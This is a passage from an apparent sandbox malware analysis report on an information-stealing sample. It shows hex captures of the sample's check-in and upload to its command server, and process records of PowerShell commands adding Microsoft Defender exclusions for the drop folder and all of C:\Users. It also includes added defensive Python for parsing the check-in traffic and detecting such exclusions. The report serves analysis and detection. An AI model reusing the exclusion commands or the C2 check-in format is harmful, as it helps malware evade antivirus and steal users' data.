                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 84 5d 9a 18 1d 41 5d db ae 9e a0 ba 7a 42 2c d1 ad dc ff 59 85 ea 17 80 f1 be 0d cc e0 c0 3d 53 5a 2e 07 b0 fb 85 c1 36 96 51 ad 09 1a eb 9d c0 ce a3 fa 6c 43 f1 76 52 6f a9 46 c3 9b 78 e3 93 ed 36 10 eb 80 34 e2 27 ec 93 d2 9c 3c 70 a0 f1 d7 96 9d 29 3a 66 db 73 a7 12 48 5e 15 a6 6d db 2a d2 a2 fb 71 3f a6 84 c5 7d 32 61 8b 74 4a 33 ce f3 a0 e8 91 f3 a4 cc c5 09 55 fe a4 76 3c ad f2 a8 9c e6 10 2c db 53 04 6c dc f8 3f 8b 8a 31 85 a7 31 b3 d4 d4 cd 46 7f 57 05 4e dd 79 12 8f bc a2 50 dd b8 98 ee 5d ae 21 48 21 d3 db 11 11 b9 21 bd d2 15 08 1b 6c cb 7f 1c 66 84 85 7d 7f 41 6b 9b 99 4a 26 8f 2d 82 8b 14 ec 20 ca 58 5d cd e7 a4 cf fc 31 13 f7 54 e3 b3 91 fe e7 9a 92 23 8e 86 85 f6 e3 8e ef a6 a3 12 8b cc 3f 7f ce dc 29 5f b0 0e 6b 4d 66 b2 ad 6b e8 1b b9 81
                                                                                                        Data Ascii: ]A]zB,Y=SZ.6QlCvRoFx64'<p):fsH^m*q?}2atJ3Uv<,Sl?11FWNyP]!H!!lf}AkJ&- X]1T#?)_kMfk
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 24 53 f6 a7 97 38 34 ce 25 c8 ea 98 b5 c8 c0 64 d6 c8 8b d4 87 df f3 49 b9 34 39 68 5c 9f 43 e9 46 6c 73 6b d7 af c6 40 a6 ef e6 95 53 9a 2e 19 5e cb 5d 8f e0 92 68 0f c9 70 77 6d c6 67 b5 92 fc dc 99 88 56 e3 d4 ad 68 ee bf 66 c6 d8 50 2d 4a 16 3b e1 02 ef 50 df c5 b3 b3 08 44 7b 1e d4 d6 3a 7b ca 2d cd 00 e3 57 9d 0a 59 12 2c 7b d2 1f 32 c5 61 ba e4 66 57 b7 73 eb 9a 6b 4d f4 c3 08 cd 6f d9 ad d4 87 b7 c8 64 ab fe ab e7 15 95 c7 0d 4b a5 e6 84 0a b7 a4 0f 49 6a 4a a1 03 ec 31 66 74 8b f4 c6 3d 79 51 31 c4 e9 0b 1c 02 69 a1 02 65 86 0d e6 95 12 14 65 f0 dd db c9 83 a7 ec 6c 75 7b 12 e8 ea 38 ae 27 3a 3f 55 39 4b d4 39 ea ae ee a2 c3 b8 09 66 46 85 f7 24 ff a4 d7 2e 4a 64 10 63 53 74 55 6b 3c 5b bd fa ce da d0 bb 5e 0d 4e 8d 70 72 30 a7 95 d1 b9 ea fc 30
                                                                                                        Data Ascii: $S84%dI49h\CFlsk@S.^]hpwmgVhfP-J;PD{:{-WY,{2afWskModKIjJ1ft=yQ1ieelu{8':?U9K9fF$.JdcStUk<[^Npr00
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 1a 95 f3 7b 69 39 e7 c9 52 62 c1 c2 67 e6 26 fd 94 70 d3 c7 d7 17 da b3 ab 97 28 ae 9a c8 ba 33 c6 5b 41 c5 74 5d af 06 89 a1 33 7c 78 76 f0 d8 32 7d 7f 0b 62 7d 09 6d 20 4c e2 70 56 49 a5 f5 ee 7f 06 f3 26 55 58 39 63 bf 4f 0f b3 6c 05 3f bf 0f 08 ad ff 9a 37 bb 1b b3 66 a6 23 f7 be f7 82 ef f6 82 af 13 00 aa 28 b9 38 40 95 97 d2 11 fb 86 2d 38 48 fc 70 1a 52 ab 3c c8 fd 8d 55 1a 07 77 9f 54 ec f8 9c 58 75 3d 4d 48 46 05 cc eb cf 46 3d 80 e6 56 b1 46 e4 bf 82 a4 bc 7d 7e 70 70 88 0f 12 c9 3d 12 50 f9 0d 5d 68 41 16 71 61 bb 7f f5 f0 83 17 1f 4a 96 7e b9 f9 dc c9 12 c4 57 66 bd 53 92 00 9b 0b 85 6f d2 d9 21 8a 87 51 ee 5d 95 49 50 0e 6f 2f 51 3f 47 ad e6 82 d6 00 d8 d4 d4 fe 4d 0b 2e 7f 45 e0 d8 37 8f 0b af 41 0d 3f 2e 81 27 e5 26 e9 72 ff 92 e2 ff 80 a0
                                                                                                        Data Ascii: {i9Rbg&p(3[At]3|xv2}b}m LpVI&UX9cOl?7f#(8@-8HpR<UwTXu=MHFF=VF}~pp=P]hAqaJ~WfSo!Q]IPo/Q?GM.E7A?.'&r
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: a0 49 c0 b5 be c2 b8 e6 ed 68 66 40 ea 95 68 f6 a8 42 2a 09 09 31 c4 48 0f 72 68 a2 de 96 58 f6 87 2b 09 ee a7 04 6a 53 3a 5c 9d 53 fd 38 76 f4 34 55 11 de 30 43 96 9d c4 f9 db 72 b6 16 46 45 bc c9 6b ac 69 6e 48 8f 47 46 82 87 2a c2 61 d3 98 ff 29 48 39 1b 61 ea 39 df bf c5 79 21 96 81 a4 d0 50 4f a5 34 fa de da 90 ed 36 49 f0 e6 31 4c 5d 77 dc 39 1d 3d 87 69 c5 68 6d c3 9f 6e 7d 40 1c 6f e4 ca 46 8b 47 8e 8b 3f e0 07 84 39 99 ff bd c1 ff e7 05 7a ef 4f a5 a0 f9 df 5d e7 a9 0d a8 83 12 c3 96 6f 41 e2 22 6e 37 97 ae fc 2c 4d ce a8 b4 9f 9d 3c 02 5d 00 c9 41 19 9c e9 1c e0 f7 88 0a 24 0d 34 1a 86 61 f3 66 27 33 c7 da 1a c2 3f cd 25 68 24 14 22 4e fc 71 1f 0c cd b8 3c d2 ae 0b dd b2 d0 3c 2e 9d 07 64 0f 98 e0 d7 6d 30 ab 82 29 3a a5 80 06 1b 2f 85 9d b8 42
                                                                                                        Data Ascii: Ihf@hB*1HrhX+jS:\S8v4U0CrFEkinHGF*a)H9a9y!PO46I1L]w9=ihmn}@oFG?9zO]oA"n7,M<]A$4af'3?%h$"Nq<<.dm0):/B
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 02 fe 1e 38 28 f0 45 4c 58 65 db 89 ab f1 b7 9b 11 83 4f b1 c2 66 c2 12 21 73 2a 2a 03 0e ae 8d 24 27 25 17 8c a9 f6 8a db 71 e3 fd 98 65 2f 7e ac 56 33 c3 e4 e9 5a 5d a0 36 f8 2c cf 78 b3 0b 03 6a 1a 28 9b d0 2a 69 6b 46 97 69 cc 0b d7 6f a1 76 4b 19 66 dd 8f af 39 b5 c5 68 98 67 d8 06 6b e9 cf f3 79 1e 2d 3c 26 b3 d7 cc 88 4a 2d 2c 30 fe 3d fc 4f cb 3f 0a 3a e6 1e 15 2b cb 00 bc 06 89 a2 c6 97 0d 7c 20 6d 40 33 ce 9a c2 96 4d 45 8c 7e 7f 2e 0b 60 9c c8 e6 71 c0 4e e8 f0 48 68 ac 98 fa 3d 9e ea f0 3b e8 ec da 52 a6 56 d5 b6 95 90 b2 90 e7 38 38 e3 64 17 89 af f5 91 d2 25 3b d5 9c 5e dd 22 96 ab 03 6c 22 4c 13 b1 19 15 3b fe f2 ff 2f d0 49 3d 44 67 db fd 73 97 3c 35 43 c6 a8 9b 1d 4b d4 cd 31 69 fe 6a 4b 0f 87 e2 e7 b5 b2 f3 59 79 26 36 8a a6 7a c0 70 e9
                                                                                                        Data Ascii: 8(ELXeOf!s**$'%qe/~V3Z]6,xj(*ikFiovKf9hgky-<&J-,0=O?:+| m@3ME~.`qNHh=;RV88d%;^"l"L;/I=Dgs<5CK1ijKYy&6zp
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 83 ac 59 8a 54 a8 eb de 68 e4 f1 04 3c d9 78 ac 83 44 35 93 4b 9b 0f 74 b6 7c 94 90 8b 9b e9 a2 14 db 15 86 da 65 46 38 8c c2 b9 07 44 a3 43 eb 8c 9e 5d 5f dc 09 5e b6 36 99 18 31 82 26 09 35 5a 43 55 86 19 70 02 db da b9 3c 49 3c 4b dc 11 1b 6a 98 49 3e 9d c1 42 5e 7f 3c 1f 0f 06 08 6d 01 f4 b2 b7 4b 07 3c 04 68 ce da 8e ce 45 a4 e4 e0 6d 50 ed 33 14 15 36 99 3e c2 62 87 f5 05 5b 71 9e e8 0a 91 be 96 48 9c eb 32 17 a6 e1 fc 71 4f ea 64 68 11 fe 84 f5 9b 7b f1 c9 21 a5 02 e3 51 73 f3 39 a6 ba b5 01 82 1c c4 e4 49 51 e9 74 93 06 3f a4 9f e0 56 39 4b fe e7 9d 52 6b c3 7e e7 78 ec 89 87 c8 5f 29 36 eb d0 7b ee 63 53 a1 f9 58 4e 1e dd 72 eb 16 05 6c 04 bf 8c d3 b8 19 cf 1b f7 a2 cb 73 2b 77 cb ea 5c ef af 08 9e ed a1 af 7d 66 2a f8 71 fc 46 98 1c c7 17 5f 1d
                                                                                                        Data Ascii: YTh<xD5Kt|eF8DC]_^61&5ZCUp<I<KjI>B^<mK<hEmP36>b[qH2qOdh{!Qs9IQt?V9KRk~x_)6{cSXNrls+w\}f*qF_
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 52 bc 17 f1 0e c6 2d a6 7a 4d af 7f a5 d4 a4 94 42 3b d4 bd fd 45 15 07 9d f5 c4 32 9f 4a 7a 66 51 0c 49 3c 34 01 47 77 5d 3a 96 01 d2 70 1d 7a a8 bc 4d b8 f3 57 cb 3d e1 f2 f5 7f cf c3 4b ce 08 a2 99 12 a0 bb 86 f0 d6 f3 3f 13 d4 88 62 04 31 4a d8 35 a7 1c d9 2b 52 75 90 46 48 46 e4 dd c3 3d 22 6f 84 4b 80 81 4a 8a c0 32 60 61 d9 6f 06 62 7c 1e 54 64 2d 6a 35 10 7c 04 7b bc d0 b1 46 5e 69 38 3b 0f 6e bf ba df 6b 53 19 e1 5a 2c d8 1b 5d 57 15 7f 03 8e 88 85 bf ac a9 11 fd 74 ae 7d 8e 69 1a 43 da ab 89 4e 9a a3 c8 35 7b d8 2f 1c d3 40 49 04 17 cb 7e c1 d2 6e 95 4e 02 25 e5 ac e3 0f 45 e9 74 44 52 1b 15 37 33 cc 68 7b 94 af fd 29 48 3e cc 65 c7 dd ff a6 14 0b 6f e0 06 3e 5f 87 83 39 8a d1 75 f4 f1 95 05 b7 97 0e aa f5 43 6a 06 bc 92 4c 57 13 3a 49 cb 3b 61
                                                                                                        Data Ascii: R-zMB;E2JzfQI<4Gw]:pzMW=K?b1J5+RuFHF="oKJ2`aob|Td-j5|{F^i8;nkSZ,]Wt}iCN5{/@I~nN%EtDR73h{)H>eo>_9uCjLW:I;a
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 43 59 22 3f 2f 2b 5d 7d 44 8a 6b 46 20 aa a5 e8 4a e6 74 95 2a 48 5f c2 82 82 1d 8a 3a 99 bc fb a9 89 04 0a 17 31 88 ac 0f 19 fa 20 19 b7 df 6f 6a f9 63 0c 4e da 2a f7 33 fd fb 8e 4f 7f ea ad d6 a5 1c df f5 fd bc c5 97 74 23 2d 75 b1 f8 80 87 cf d7 9b 37 a5 16 6a a6 7e 1d e0 99 70 d1 b4 66 99 6e 7e 70 2e ba d1 b7 5b 15 3f ab ab 35 64 12 7e 64 18 10 6a b3 db 7f 8e 8d 0a 9a bb a1 c9 3b 40 ad 7f 74 94 4f 90 7b 31 6e b1 b2 b0 0a 0d 7f 3b f8 df 3f 74 6d 67 91 4c 8e 37 3f 10 c3 a6 c0 f5 79 55 df 89 71 3c ca 6d 35 b1 03 1c 3d c8 c5 72 36 52 8a cf 1d a6 e9 20 71 8b 45 98 1d cf d8 47 a2 6f c6 52 f6 cd 1e 3e 9b e3 47 7f d9 62 35 4e e5 c8 83 b4 4f 4a 99 90 43 34 e5 dd 27 69 5c ea b7 3a 01 76 60 5d 76 16 cb 63 81 72 0b 27 9a f2 ce 05 50 9f 60 3c 5d 27 95 2e 35 ba f3
                                                                                                        Data Ascii: CY"?/+]}DkF Jt*H_:1 ojcN*3Ot#-u7j~pfn~p.[?5d~dj;@tO{1n;?tmgL7?yUq<m5=r6R qEGoR>Gb5NOJC4'i\:v`]vcr'P`<]'.5
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: c5 17 f6 36 62 40 f9 21 95 80 be 6f a0 48 91 2b 2f 04 2e b4 4b e1 e0 8c 33 c0 77 2b 70 c1 ae f6 42 d4 da aa e0 f3 78 e0 df 0c 55 06 9f 17 e2 6f cb f6 d0 43 e3 02 40 d1 ec 9f 2d 6f db 1c b1 6c 67 2c 9f 30 37 f5 21 2e ba d4 5b 83 9b f3 30 e3 77 0d 19 23 43 10 c9 64 9f dd 2a a5 d0 17 fd 16 69 ea b6 71 df 4d 33 7f 55 d0 71 e2 23 d0 5c fb 0f e9 a4 37 3d 5e 3a 3b b9 27 f7 ab 54 87 db aa d4 c1 8c 0f ad 61 4e f1 cb 53 d2 4a 04 14 21 bf ee 93 b4 32 25 49 a4 84 73 c6 2c e5 fb 0e 31 4f 56 9b b4 92 b0 1d 4c cd 17 61 cc 3e a6 b8 7a 11 ed 98 16 0a 10 a8 5b 1d 25 13 e8 44 6a b2 4e 0a 20 39 91 8a 92 6b 8d 93 5c 1a d7 6b 36 c8 b8 5e 56 3f f4 06 0f 91 e5 19 e3 4b c3 c6 2d 6f 1a bc 09 40 3e 61 b9 e1 24 31 63 3e f7 cd a0 13 77 e8 b1 22 85 62 e3 9c 65 cb b8 a8 ea 72 c3 e2 82
                                                                                                        Data Ascii: 6b@!oH+/.K3w+pBxUoC@-olg,07!.[0w#Cd*iqM3Uq#\7=^:;'TaNSJ!2%Is,1OVLa>z[%DjN 9k\k6^V?K-o@>a$1c>w"ber
                                                                                                        2024-12-27 12:11:25 UTC | 1135 bytes | IN | HTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:25 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=betv58ja80vq9ug848n0me1g0h; expires=Tue, 22 Apr 2025 05:58:04 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4G8nxA8CyJ6F6Tdwjii%2BCVtyq%2F%2BhCogGxdxXV29BcLBwVf%2BRSbQBN8WjyUOdh7JO0bYRoZIDaV3X2l%2BVpn2osVPZxKF9HtrXVT2tGtBfqm98pyVsqEuu53X3hGu1DYQ54hs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f89367a89d24358-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6856&min_rtt=6856&rtt_var=3428&sent=208&recv=611&lost=0&retrans=1&sent_bytes=4214&recv_bytes=591562&delivery_rate=141781&cwnd=206&unsent_bytes=0&cid=222e11185ba746cc&ts=3302&x=0"


                                                                                                        Session ID: 9 | Source IP: 192.168.2.5 | Source Port: 49744 | Destination IP: 172.67.216.236 | Destination Port: 443 | PID: 6396 | Process: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-27 12:11:27 UTC | 263 bytes | OUT | POST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 77
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:27 UTC | 77 bytes | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=nbYRKl--&j=&hwid=FE2FA5131359532BBEBA0C6A975F1733
                                                                                                        2024-12-27 12:11:28 UTC | 1126 bytes | IN | HTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:27 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=f8sh7ndnnqq3sft7fupalgp8nl; expires=Tue, 22 Apr 2025 05:58:06 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=khw5LxGLq%2Fe3G66Nf4FdKXNCdXw9j8mW8DiUzHZRxF0X23td1fic9ShT5IDqzoQkiHTPUkmHyKyILpmKYChilIUa0CQdEroIUcs%2F9afF8Qp2cDWBwtuiqE%2Fq%2FZ4WZehkh7I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f893697bcd44386-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2103&min_rtt=2083&rtt_var=822&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=976&delivery_rate=1298932&cwnd=246&unsent_bytes=0&cid=75c52ee6e60ff5a2&ts=1058&x=0"
                                                                                                        2024-12-27 12:11:28 UTC | 54 bytes | IN | Data Raw: 33 30 0d 0a 62 31 69 50 2f 38 72 71 6c 42 41 62 35 4f 69 78 51 2b 72 35 73 65 69 6f 57 72 71 4f 55 31 61 4a 74 39 2f 59 46 53 34 6b 53 50 38 30 42 51 3d 3d 0d 0a
                                                                                                        Data Ascii: 30b1iP/8rqlBAb5OixQ+r5seioWrqOU1aJt9/YFS4kSP80BQ==  (chunk size 0x30 = 48 bytes; the payload is the base64 string b1iP/8rqlBAb5OixQ+r5seioWrqOU1aJt9/YFS4kSP80BQ==, which decodes to 34 bytes)
                                                                                                        2024-12-27 12:11:28 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0  (terminating zero-length chunk)
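
Read together, sessions 8 and 9 are one check-in: the session 8 upload is a multipart POST whose first three parts are plain text (hwid, pid, lid) followed by an opaque blob, and session 9 repeats the same lid and hwid in a form-encoded act=get_message request; both replies come back chunked. The parser below is an added example written for this report, not code from the sample, its C2 or Joe Sandbox. Its sample bytes are constructed from the hex shown above (the multipart body is only the 256 bytes the sandbox view displays), and the "check-in shape" test encodes only the pattern visible here, not a general LummaC specification.

```python
"""Parse the /api check-in pair from sessions 8 and 9 of this report.

Added example for this report, not code from the sample, its C2 or Joe Sandbox.
The byte strings are constructed from the hex the report shows."""
import base64
import re
from urllib.parse import parse_qs

# Session 8: first 256 bytes of the multipart body (the sandbox view stops
# there, so the fourth part is cut off after "Conte").
SESSION8_CONTENT_TYPE = "multipart/form-data; boundary=97FF7KQWH025"
SESSION8_BODY_HEAD = (
    b'--97FF7KQWH025\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    b"FE2FA5131359532BBEBA0C6A975F1733\r\n"
    b'--97FF7KQWH025\r\nContent-Disposition: form-data; name="pid"\r\n\r\n1\r\n'
    b'--97FF7KQWH025\r\nContent-Disposition: form-data; name="lid"\r\n\r\nnbYRKl--\r\n'
    b"--97FF7KQWH025\r\nConte"
)
# Session 9: the 77-byte form body and its chunked reply.
SESSION9_BODY = b"act=get_message&ver=4.0&lid=nbYRKl--&j=&hwid=FE2FA5131359532BBEBA0C6A975F1733"
SESSION9_REPLY = b"30\r\nb1iP/8rqlBAb5OixQ+r5seioWrqOU1aJt9/YFS4kSP80BQ==\r\n0\r\n\r\n"
# The chunked reply shown at the top of this section.
EARLIER_REPLY = b"f\r\nok 8.46.123.189\r\n0\r\n\r\n"


def parse_multipart_fields(body, content_type):
    """Return {part name: value} for every complete part of a multipart body.
    A part truncated before its blank header/body separator is skipped, not guessed."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                       # truncated part: headers only
            continue
        name = re.search(rb';\s*name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def decode_chunked(raw):
    """Reassemble an HTTP/1.1 chunked body: hex size, CRLF, data, CRLF, ... , 0, CRLF, CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        out += raw[pos:pos + size]
        pos += size + 2                               # skip the data and its CRLF
    return bytes(out)


def looks_like_lumma_checkin(fields):
    """Shape seen in this report: a 32-hex-digit hwid part plus pid and lid parts."""
    hwid = fields.get("hwid", b"")
    return re.fullmatch(rb"[0-9A-F]{32}", hwid) is not None and {"pid", "lid"}.issubset(fields)


def summarize_checkin(multipart_body, content_type, form_body, chunked_reply):
    """Correlate the multipart upload with the follow-up get_message request and its reply."""
    upload = parse_multipart_fields(multipart_body, content_type)
    msg = {k: v[0] for k, v in parse_qs(form_body.decode(), keep_blank_values=True).items()}
    reply_b64 = decode_chunked(chunked_reply)
    hwid = upload.get("hwid", b"").decode()
    lid = upload.get("lid", b"").decode()
    return {
        "hwid": hwid,
        "lid": lid,
        "pid": upload.get("pid", b"").decode(),
        "checkin_shape": looks_like_lumma_checkin(upload),
        "act": msg.get("act"),
        "ver": msg.get("ver"),
        "same_hwid": hwid == msg.get("hwid"),
        "same_lid": lid == msg.get("lid"),
        "reply_bytes": len(base64.b64decode(reply_b64)),
    }


if __name__ == "__main__":
    print(summarize_checkin(SESSION8_BODY_HEAD, SESSION8_CONTENT_TYPE, SESSION9_BODY, SESSION9_REPLY))
    print(decode_chunked(EARLIER_REPLY))
```

The hwid and lid pair is what ties the two sessions to one infection, so it is the value to pivot on in proxy logs; the 77-byte form body is a stable size for this exact field set, but the multipart Content-Length (588978 here) depends on how much was harvested and should not be used as an indicator.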


                                                                                                        Target ID:0
                                                                                                        Start time:07:10:52
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Users\user\Desktop\OiMp3TH.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\OiMp3TH.exe"
                                                                                                        Imagebase:0xf30000
                                                                                                        File size:94'720 bytes
                                                                                                        MD5 hash:AB408F4EB577EDA6D98941EDE1B44863
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:false

                                                                                                        Target ID:1
                                                                                                        Start time:07:10:53
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                                                                                                        Imagebase:0x780000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:07:10:53
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:07:10:56
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                        Imagebase:0x780000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:07:10:56
                                                                                                        Start date:27/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true
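
Target IDs 1 and 5 each run powershell.exe with Add-MpPreference -ExclusionPath, first for the drop directory C:\nhrhvnf and then for all of C:\Users, which silences Defender for every user profile on the host. The detection below is an added example written for this report, not code from the sample or from Joe Sandbox: it scans process-creation records for Defender exclusion changes and rates an exclusion covering a drive root or a whole profile tree as high severity. The first two command lines are the ones listed above; the third record is a hypothetical -EncodedCommand variant constructed here to show the check still fires when the cmdlet is base64-encoded, and the fourth is a constructed benign launch.

```python
"""Flag Windows Defender exclusion changes in process-creation records.

Added example for this report, not code from the sample or Joe Sandbox."""
import base64
import re

# Constructed records: two command lines copied from the report, one hypothetical
# base64 (UTF-16LE, as PowerShell expects) variant, and one benign launch.
_ENCODED = base64.b64encode("Add-MpPreference -ExclusionPath 'C:\\Users'".encode("utf-16-le")).decode()
RECORDS = [
    {"pid": 1, "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath 'C:\\nhrhvnf'"},
    {"pid": 5, "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath 'C:\\Users'"},
    {"pid": 11, "cmdline": "powershell.exe -NoProfile -EncodedCommand " + _ENCODED},   # hypothetical
    {"pid": 12, "cmdline": "powershell.exe Get-MpPreference"},                         # benign
]

CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.I)
PARAM = re.compile(r"""-(Exclusion(?:Path|Process|Extension|IpAddress))\s+('[^']*'|"[^"]*"|\S+)""", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
BROAD_DIRS = {"c:\\users", "c:\\users\\public", "c:\\windows", "c:\\windows\\temp", "c:\\programdata"}


def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) if one is present."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline, False
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False
    return cmdline + " " + decoded, True


def is_broad(param, value):
    """True when the exclusion blinds Defender to far more than one dropped file."""
    v = value.lower().rstrip("\\")
    if param.lower() == "exclusionpath":
        return v == "*" or re.fullmatch(r"[a-z]:", v) is not None or v in BROAD_DIRS
    if param.lower() == "exclusionextension":
        return v.lstrip(".") in {"*", "exe", "dll", "ps1"}
    return v in {"*", "powershell.exe", "cmd.exe"}


def find_defender_exclusions(records):
    """Return one finding per exclusion parameter seen in an Add/Set-MpPreference command line."""
    findings = []
    for rec in records:
        text, was_encoded = expand_encoded(rec["cmdline"])
        if not CMDLET.search(text):
            continue
        for param, raw_value in PARAM.findall(text):
            value = raw_value.strip("'\"")
            findings.append({
                "pid": rec["pid"],
                "param": param,
                "value": value,
                "severity": "high" if is_broad(param, value) else "medium",
                "from_encoded": was_encoded,
            })
    return findings


if __name__ == "__main__":
    for f in find_defender_exclusions(RECORDS):
        print(f)
```

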